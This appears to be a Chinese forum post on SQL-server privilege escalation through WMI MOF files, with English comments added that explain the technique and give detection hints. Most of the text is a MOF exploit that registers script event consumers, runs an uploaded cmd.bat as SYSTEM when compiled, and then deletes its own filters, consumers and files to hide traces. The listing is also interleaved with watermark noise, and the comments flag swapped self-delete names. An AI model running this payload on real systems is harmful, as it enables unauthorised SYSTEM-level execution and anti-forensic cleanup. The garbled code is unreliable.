这个sql提权MOF需要运行 system下的文件,不能定义路径。) x6 z0 C8 e4 i4 j' M
需要将要运行的命令写入到bat上传到system32目录,然后执行。
`3 Y# w6 H4 m- c; y" } c/ L! x P' _' O c) ]% ]& U
这个sql提权MOF需要运行 system下的文件,不能定义路径。
5 S, W# H9 }5 H2 Z需要将要运行的命令写入到bat上传到system32目录,然后执行。+ ?" O& `4 R5 u7 R1 F6 x9 k
' x4 ?6 [9 p( v5 {& }, l# B
// NOTE(review): the listing below is interleaved with forum anti-copy watermark
// text (the runs of letters/digits/punctuation between the MOF tokens) and is
// not compilable as shown; it is kept byte-identical here, comments only added.
// As far as the visible tokens show, the MOF declares a permanent WMI event
// subscription in root\cimv2: a marker class (MyClass547), a local declaration
// of ActiveScriptEventConsumer plus its provider registration, two JScript
// consumers, two __EventFilter instances and the two bindings joining them.
// Compiling the file creates the final MyClass547 instance, which matches the
// first filter, so the JScript executes as a side effect of compilation in the
// WMI provider host's context (LocalSystem by default - the privilege gain the
// page's author is after).
// Detection/mitigation: alert on creation of __EventFilter, __EventConsumer
// subclasses and __FilterToConsumerBinding (Sysmon event IDs 19-21, the
// WMI-Activity operational log), on MOF files appearing under
// %SystemRoot%\System32\wbem\mof, and on Wscript.Shell / cmd.exe children of
// wmiprvse.exe; audit existing subscriptions with Get-WmiObject/Get-CimInstance
// against root\subscription and root\cimv2 and remove unknown bindings.
#pragma
9 L- W1 Z9 D, c0 b2 d" `3 m namespace("\\\\.\\root\\cimv2")
// Marker class: its only role is that an instance of it is created at the end
// of the file, producing the __InstanceCreationEvent that the first filter
// matches (no payload lives here).
( W3 Q+ T; m- w1 C% A class/ X" ?: D9 F4 }* \
MyClass547
/ ?+ n v, U1 x* w { [key]7 F" l; A, ~; u5 p( F1 |
string
5 O b9 I4 m; z1 ^/ [7 H0 [ Name;+ H% y4 O6 ?& z7 b) \7 k( _* Q; C
};0 [5 U0 _$ f8 q9 w: Z& s; K
// Redeclaration of the standard script consumer class in root\cimv2 (it is
// normally registered only in root\subscription); the provider registration
// below uses the fixed CLSID shown on the page so the class becomes usable in
// this namespace. Seeing this class declared outside root\subscription is
// itself a good hunting indicator.
class8 C( ] U/ ~) d0 M+ {+ _
ActiveScriptEventConsumer
% j$ ]3 }( e: s' F! ^* D : __EventConsumer { [key] b% r2 {) k% T" `3 ^
string
p+ S6 y. e( C" I5 M6 I& T Name; [not_null]
8 B2 @* o$ M* D6 h3 G. y0 u% A string( x3 M$ q( `' ^3 |: B: k
ScriptingEngine; string
1 X# P: J! t1 I" o5 L0 i ScriptFileName; [template]
) U8 R+ G# I: J# U string
1 w; H8 ?9 ~' }, M' `2 r ScriptText; uint32 KillTimeout;/ K& R7 e) D/ n2 L
}; instance of __Win32Provider as $P {
4 b' N& c6 }) F0 n4 J8 y Name
8 R4 ]: B8 P3 B; U1 h8 b) s8 T1 q =
8 d! `/ w! X) q. { B "ActiveScriptEventConsumer"; CLSID =) Z3 C3 C$ l k+ V h" G
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";; H6 n4 e9 B( A' |
PerUserInitialization# D( Y& g6 T: [+ |# w* m. [
= TRUE;
1 v8 k3 D! w9 s$ i/ i7 t( w0 v, l9 B }; instance of __EventConsumerProviderRegistration { Provider
! P- L3 K* R, Q5 M8 g$ \6 B = $P; ConsumerClassNames
1 a/ v2 r B! ?6 m% l7 t =! k1 }$ u/ H$ v# k: s; b0 u* \) D5 t
{"ActiveScriptEventConsumer"};
; X. p' ~7 k! K0 D; a };
// First consumer ("ASEC"): the JScript launches "cmd.bat" via Wscript.Shell
// and then deletes the MyClass547 class, the "instfilt" filter and itself -
// i.e. it removes its own subscription artifacts, so a post-hoc WMI
// subscription audit may find nothing; rely on event-time logging instead.
4 F6 I6 m ?- y Instance of ActiveScriptEventConsumer3 H1 j' `+ d$ z. w% v& N
as $cons { Name- h) R2 O9 _' B+ l* c. J9 a2 I
=
' a" C1 a9 G1 d) ~* o! w1 _ "ASEC"; ScriptingEngine/ C: U0 k& M9 s3 `7 [' U9 j
=: S9 x. |1 x' g( j2 r7 H
"JScript"; ScriptText; P H+ F, v1 n1 B' M
=- b' g1 n# M3 e& p
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");} catch(err) {};"; };
// Second consumer ("qndASEC"): cleanup stage. It deletes the compiled MOF
// under wbem\mof\good (the path the author expects the file to be moved to
// after compilation), deletes cmd.bat, and removes the "qndfilt" filter and
// itself. The script text on this page has "ASEC" and "qndASEC" swapped
// between the two consumers' self-delete calls - presumably a transcription
// artifact; noted, not corrected.
6 w6 D* F K4 T# s# M3 ?+ r Instance of ActiveScriptEventConsumer; |- C. }, d' Z
as $cons2 { Name
8 g, y$ q" j8 ^! [ =3 x% v) u( H C0 [- ?5 A
"qndASEC"; ScriptingEngine f+ h8 j/ R. d9 ?, | R
=
* v. B% h6 \& P# z! B "JScript"; ScriptText
& N! Q# s1 d: E2 F5 P3 n2 H1 j' d =
/ h' A% K0 T ]5 ^* n* h "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
// Filter 1 ("instfilt"): fires when an instance of MyClass547 is created -
// satisfied by the last statement of this file, which is what makes the
// payload run at compile time rather than on a later trigger.
. o$ {) O* B: K }; instance of __EventFilter as $Filt { Name
4 S* ^" i9 y. x( ] a' N =
# Q' F) V$ {8 Q; p, q. `4 Z "instfilt"; Query5 I0 i# L( O, G: H5 a- q& Q9 G/ [! ]9 A
=
6 u0 d( Q6 ~0 \9 M4 z* Z& \ "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage- s- e T; C% j2 _- |5 U
=8 I7 k, v* j: ?/ s
// Filter 2 ("qndfilt"): polls once a second for a Win32_Process named
// "cmd.bat" disappearing, i.e. the cleanup consumer runs after the first
// script's process exits. A WQL query on __InstanceDeletionEvent WITHIN 1 for
// Win32_Process is an unusual pattern worth flagging in subscription audits.
"WQL"; }; instance of __EventFilter as $Filt2 { Name
; m2 |) H6 s" Q5 k6 w% `# I =
& p6 ?; ?( [$ c: j "qndfilt"; Query
9 I0 P, u3 S4 [ d+ Z =
. E8 B* {! I7 [9 [. @ "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage A. @' i7 P) ]9 g
=
// Bindings: filter -> consumer pairs. These __FilterToConsumerBinding
// instances are the objects Sysmon event ID 21 reports; their creation is the
// most reliable single signal for this whole technique.
2 W* A0 F1 L8 r2 E "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer7 j0 M% ?2 s, h/ r
= $cons; Filter
6 Y7 Q) A; g3 E* O) L3 M = $Filt;+ b7 o- A c% ^6 ^
}; instance of __FilterToConsumerBinding as $bind2 { Consumer4 k9 u" S1 r9 W* X
= $cons2; Filter: N2 T" q: N5 i$ K" I' r- @
= $Filt2;
// Trigger: creating this MyClass547 instance is the __InstanceCreationEvent
// that "instfilt" matches, so compiling the file executes the first script.
! l4 A* [. ]" S. l0 n }; instance of MyClass547' z% H, Q. I6 C0 `9 Y# ]* s6 [
as $MyClass { Name- X+ F1 I, w5 R X3 I5 O9 O" ?2 @
=8 I1 N6 d- z, t( E8 [
"ClassConsumer";5 m) p6 H) |9 D+ c
}; |